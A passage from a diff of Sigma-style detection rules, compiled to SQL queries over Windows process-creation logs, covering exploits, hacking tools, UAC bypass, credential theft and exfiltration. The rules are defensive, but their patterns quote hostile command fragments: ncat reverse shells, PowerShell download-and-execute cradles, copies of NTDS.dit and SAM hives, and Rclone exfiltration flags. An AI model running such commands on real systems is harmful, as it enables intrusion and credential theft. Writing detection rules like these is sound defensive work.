'%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE 